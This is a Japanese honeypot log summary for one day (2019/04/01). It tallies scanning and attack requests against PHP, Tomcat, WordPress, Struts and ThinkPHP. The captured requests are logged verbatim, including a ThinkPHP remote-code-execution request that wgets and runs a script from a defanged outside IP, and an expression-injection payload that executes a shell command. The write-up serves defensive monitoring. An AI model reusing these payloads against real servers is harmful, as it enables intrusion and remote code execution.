BW-Potのログ分析 (2019/04/01)
本日の総アクセス件数は705件です。送信元IP数は104IPです。
久しぶりにWebShellの調査と思われる通信を確認しました。
h=die('Hello, Peppa!');
Peppaって何でしょうかね?PeppaPigというアニメがアメリカであるそうなので、それでしょうか?
送信元も西海岸からのようでしたので。
Apache Strutsに関する調査と思われる通信を確認しました。
CVE-2019-0211が発見されたことで、調査をはじめたと思われます。仕事が早いですね。
| POST /users?page=&size=5 username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/su")]=&password=&repeatedPassword= |
という通信がありましたが、詳細わからず…
| 件数 | 種別 | リクエスト |
| 307 | phpMyAdminに関する攻撃 | POST /phpmyadmin/ |
| 290 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 66 | アクセス | GET / |
| 3 | クローリング | HEAD /robots.txt |
| 2 | WordPressに関する調査 | GET /1/wp-login.php |
| 2 | WordPressに関する調査 | GET /2/wp-login.php |
| 2 | WordPressに関する調査 | GET /3/wp-login.php |
| 2 | WordPressに関する調査 | GET /site/wp-login.php |
| 2 | WordPressに関する調査 | GET /wp/wp-login.php |
| 1 | 不正中継の調査 | GET api.ipify[.]org/ |
| 1 | 不正中継の調査 | GET boxun[.]com/ |
| 1 | 不正中継の調査 | GET www.123cha[.]com/ |
| 1 | 不正中継の調査 | GET www.epochtimes[.]com/ |
| 1 | 不正中継の調査 | GET www.ip[.]cn/ |
| 1 | 不正中継の調査 | GET www.minghui[.]org/ |
| 1 | 不正中継の調査 | GET www.wujieliulan[.]com/ |
| 1 | 不明 | PROPFIND / |
| 1 | 環境設定の調査 | GET /.env |
| 1 | Gitに関する調査 | GET /.git/config |
| 1 | D-Link デバイスに関する調査 | GET /HNAP1/ |
| 1 | ThinkPHPに関する調査 | GET /TP/public/index.php |
| 1 | ThinkPHPに関する攻撃 | POST /TP/public/index.php?s=captcha |
| 1 | ThinkPHPに関する攻撃 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
| 1 | 不正中継の調査 | GET api.binance[.]com/api/v1/time |
| 1 | ConferenceManagementSystem Colibriに関する調査 | GET /colibri/conferences |
| 1 | WordPressに関する調査 | GET /domain/wp-login.php |
| 1 | 不正中継の調査 | GET www.rfa[.]org/english/ |
| 1 | Apache Struts 2に関する調査 | GET /index.action |
| 1 | Apache Strutsに関する調査 | GET /index.do |
| 1 | ThinkPHPに関する攻撃 | GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20hxxp://82.212.70[.]218/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; |
| 1 | phpのWebShell設置の調査 | POST /s.php |
| 1 | phpのWebShell設置の調査 | POST /sheep.php |
| 1 | Apache Struts 2に関する調査 | GET /struts2-rest-showcase/orders.xhtml |
| 1 | 不明 | POST /users?page=&size=5 |
| 1 | phpのWebShell設置の調査 | POST /w.php |
| 1 | phpのWebShell設置の調査 | POST /wuwu11.php |
| 1 | phpのWebShell設置の調査 | POST /xw.php |
| 1 | phpのWebShell設置の調査 | POST /xx.php |
